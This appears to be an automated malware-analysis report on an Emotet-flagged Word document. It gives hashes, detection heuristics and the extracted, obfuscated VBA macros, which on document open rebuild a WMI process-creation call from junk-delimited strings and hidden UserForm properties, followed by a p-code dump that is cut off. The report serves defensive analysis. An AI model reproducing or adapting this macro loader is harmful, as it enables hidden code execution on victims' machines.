Office (OLE) malware analysis — malicious · 8bd60d02746f81a1

MALICIOUS

Office (OLE)

216.2 KB Created: 2020-02-05 06:54:00 Authoring application: Microsoft Office Word First seen: 2021-01-11

MD5: 8de6e543687b17e1613b4c8ec076cb0b SHA-1: 479eb416b8893fd51a03797b1b357573e9026ba2 SHA-256: 8bd60d02746f81a1ca8d3428501c89e11d82de45bc47abc5761fb89466796574

230 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7577855-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7577855-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script
```
Oiobkuwqsy = CVar(Join(Split(Wfinndsyt, "}&*$**(){"), NoLineBreakAfter))
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Szsuprxwu = CreateObject(Wyvieuwpopbd)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32958 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32958 bytes
SHA-256: `171b710578c0d5f990c6710b1eae42f20e1e8c2c0052728abb4a4cd29e2d61c2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Bauiwbxvwwp" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Zoqazakuxfsa.Hpqcquqbbiaa End Sub Attribute VB_Name = "Oxuzrzcyuqz" Attribute VB_Base = "0{8F6D337A-5DE8-48B3-B74A-94AF8030D19A}{02F8F909-73DA-407A-BA7C-56FAE01F69FE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ltvtvvmlva" Attribute VB_Base = "0{7AAFCB00-977A-4352-A6B0-87F71B61DF84}{74EF03E2-C6EE-4D1F-B811-1AAF1C239276}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ipnhlkcafs() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Jcmbwkfpiml" Attribute VB_Base = "0{572F5F51-B8B9-4209-AC42-D41A45BE404D}{08ECDB5E-A613-4D0E-AE0A-790E9FCB0420}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Flxhjxdv() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Eegfjped" Attribute VB_Base = "0{99959E7E-84FE-414F-A7D3-209D49CEFEB9}{2969A8EF-155C-45C8-97C5-92F7331D9F02}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Fjsjlpkvma() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Bdgyeswv" Attribute VB_Base = "0{3A0E6CFA-5374-4119-969E-481C38E449EF}{63E8632C-858A-4978-9973-D4A2ABD2C966}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ebixqfvzdisa() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Towuniiefadd" Attribute VB_Base = "0{E1346B7F-ACAA-4DA9-B04E-BAD3DBC3A54E}{ACA6E90A-2000-4029-B89B-C60C1FEAE7DA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Kmhxfkfqao() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Zmxmkafkf" Attribute VB_Base = "0{60AF3345-9FDE-4DE1-837E-C0CEC50A3CA2}{B86ABB70-DED0-48A6-B0EB-0E4D9C244A86}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Bhwmzwhumgko() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Uvnpcniv" Attribute VB_Base = "0{A41C6ABE-5B00-4E45-9D23-EE955A4F2834}{E708A6BC-58BF-4862-AF94-89924E09C8C9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Vhspcyofur() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Zoqazakuxfsa" Function Hpqcquqbbiaa() HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Bhwtsprjd = "}&$(){}&$*(){w}&$*(){i}&$*(){}&$*(){n}&$*(){m}&$*(){g}&$*(){}&$*(){mt}&$*(){}&$*(){" + ChrW(Oxuzrzcyuqz.Zoom + 15) + ":}&$*(){wi}&$*(){}&$*(){n3}&$*(){}&$*(){}&$*(){2}&$*(){}&$*(){_}&$*(){}&$*(){" + Oxuzrzcyuqz.Rkgrnwuuc + "r}&$*(){}&$*(){o}&$*(){ce}&$*(){s}&$*(){}&$*(){s}&$*(){" HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Wyvieuwpopbd = Oiobkuwqsy(Bhwtsprjd) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Set Szsuprxwu = CreateObject(Wyvieuwpopbd) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Dygqqlldxn = Oxuzrzcyuqz.Wldlltzabxia.Tag HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Loglemsf = Wyvieuwpopbd + ChrW(Oxuzrzcyuqz.Zoom + 15) + Oxuzrzcyuqz.Nvaqkmyiymb.Tag + Dygqqlldxn HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Qccafrtde = Loglemsf + Oxuzrzcyuqz.Rkgrnwuuc HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Set Yddwdalk = Vyirvuquvu(Qccafrtde) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Call Szsuprxwu. _ Create(khknasas + Dwbdfdaieqnpc + nbswe, Qvnzlczddco, Yddwdalk) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function Function Vyirvuquvu(Dqtbehgj) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Set Vyirvuquvu = CreateObject(Dqtbehgj) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Vyirvuquvu. _ showwindow = Rqhjugji + Actinokzknau HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function Function Oiobkuwqsy(Wfinndsyt) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Oiobkuwqsy = CVar(Join(Split(Wfinndsyt, "}&$*(){"), NoLineBreakAfter)) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function Function Dwbdfdaieqnpc() HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq nnannauwe = "}&$*(){ }&$*(){-}&$*(){e}&$*(){ }&$*(){" HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Lvlwmpwkmr = ChrW(Int(wdKeyP)) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Grawwoqo = Lvlwmpwkmr + Oxuzrzcyuqz.Ngytvueo.ControlTipText + nnannauwe HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq dkhiqwhnkew = Oxuzrzcyuqz.Eqbswmtp.Pages(0).Caption HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq Dwbdfdaieqnpc = Oiobkuwqsy(Grawwoqo + StrReverse(dkhiqwhnkew)) HgKlHeRxyx = Trim$(" fpCzbOrrBK ") eYCgTHbUrq = Trim$(" kSTokTqrAE ") AepzxwaawS = Trim$(" vcNMCvZAtj ") hRoTwUiEiW = Trim$(" GeEhhzvoze ") wqPQZAJhhx = Trim$(" wjOhwARgBL ") EZTGslBbfq = "zSzItGhKYQ" sPkiPWgEFY = 112628 EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY) FlAUEmBDUn = EZTGslBbfq End Function ' Processing file: /opt/analyzer/scan_staging/53fb3e572c0744dd91b9e94117ca8c32.bin ' =============================================================================== ' Module streams: ' Macros/VBA/Bauiwbxvwwp - 1907 bytes ' Line #0: ' FuncDefn (Private Sub Bauiwbxvwwp()) ' Line #1: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #2: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #3: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #4: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #5: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #6: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #7: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #8: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #9: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #10: ' Ld FlAUEmBDUn ' ArgsMemCall Zoqazakuxfsa 0x0000 ' Line #11: ' EndSub ' Macros/VBA/Oxuzrzcyuqz - 1169 bytes ' Macros/VBA/Ltvtvvmlva - 1395 bytes ' Line #0: ' FuncDefn (Sub Ipnhlkcafs()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Jcmbwkfpiml - 1392 bytes ' Line #0: ' FuncDefn (Sub Flxhjxdv()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Eegfjped - 1394 bytes ' Line #0: ' FuncDefn (Sub Fjsjlpkvma()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Bdgyeswv - 1396 bytes ' Line #0: ' FuncDefn (Sub Ebixqfvzdisa()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Towuniiefadd - 1396 bytes ' Line #0: ' FuncDefn (Sub Kmhxfkfqao()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Zmxmkafkf - 1397 bytes ' Line #0: ' FuncDefn (Sub Bhwmzwhumgko()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Uvnpcniv - 1394 bytes ' Line #0: ' FuncDefn (Sub Vhspcyofur()) ' Line #1: ' Debug ' PrintObj ' LitStr 0x0007 "NXBUWWD" ' Ld DDD ' Add ' LitStr 0x0005 "pOLON" ' Add ' PrintItemNL ' Line #2: ' EndSub ' Macros/VBA/Zoqazakuxfsa - 11840 bytes ' Line #0: ' FuncDefn (Function Zoqazakuxfsa()) ' Line #1: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #2: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #3: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #4: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #5: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #6: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #7: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #8: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #9: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #10: ' LitStr 0x006A "}&$*(){}&$*(){w}&$*(){i}&$*(){}&$*(){n}&$*(){m}&$*(){g}&$*(){}&$*(){mt}&$*(){}&$*(){" ' Ld Oxuzrzcyuqz ' MemLd ChrW ' LitDI2 0x000F ' Add ' ArgsLd Bhwtsprjd 0x0001 ' Add ' LitStr 0x0061 ":}&$*(){wi}&$*(){}&$*(){n3}&$*(){}&$*(){}&$*(){2}&$*(){}&$*(){_}&$*(){}&$*(){" ' Add ' Ld Oxuzrzcyuqz ' MemLd Zoom ' Add ' LitStr 0x0045 "r}&$*(){}&$*(){o}&$*(){ce}&$*(){s}&$*(){}&$*(){s}&$**(){" ' Add ' St Hpqcquqbbiaa ' Line #11: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #12: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #13: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #14: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #15: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #16: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #17: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #18: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #19: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #20: ' Ld Hpqcquqbbiaa ' ArgsLd Wyvieuwpopbd 0x0001 ' St Rkgrnwuuc ' Line #21: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #22: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #23: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #24: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #25: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #26: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #27: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #28: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #29: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #30: ' SetStmt ' Ld Rkgrnwuuc ' ArgsLd Szsuprxwu 0x0001 ' Set Oiobkuwqsy ' Line #31: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #32: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #33: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #34: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #35: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #36: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #37: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #38: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #39: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #40: ' Ld Oxuzrzcyuqz ' MemLd Dygqqlldxn ' MemLd Tag ' St CreateObject ' Line #41: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #42: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #43: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #44: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #45: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #46: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #47: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #48: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #49: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #50: ' Ld Rkgrnwuuc ' Ld Oxuzrzcyuqz ' MemLd ChrW ' LitDI2 0x000F ' Add ' ArgsLd Bhwtsprjd 0x0001 ' Add ' Ld Oxuzrzcyuqz ' MemLd Loglemsf ' MemLd Tag ' Add ' Ld CreateObject ' Add ' St Wldlltzabxia ' Line #51: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #52: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #53: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St eYCgTHbUrq ' Line #54: ' LitStr 0x0015 " GeEhhzvoze " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St AepzxwaawS ' Line #55: ' LitStr 0x0015 " wjOhwARgBL " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St hRoTwUiEiW ' Line #56: ' LitStr 0x000A "zSzItGhKYQ" ' St wqPQZAJhhx ' Line #57: ' LitDI4 0xB7F4 0x0001 ' St EZTGslBbfq ' Line #58: ' Ld wqPQZAJhhx ' Ld EZTGslBbfq ' Coerce (Str) ' Concat ' St wqPQZAJhhx ' Line #59: ' Ld wqPQZAJhhx ' St sPkiPWgEFY ' Line #60: ' Ld Wldlltzabxia ' Ld Oxuzrzcyuqz ' MemLd Zoom ' Add ' St Nvaqkmyiymb ' Line #61: ' LitStr 0x0015 " fpCzbOrrBK " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Document_open ' Line #62: ' LitStr 0x0015 " kSTokTqrAE " ' ArgsLd HgKlHeRxyx$ 0x0001 ' St Trim ' Line #63: ' LitStr 0x0015 " vcNMCvZAtj " ' ArgsLd 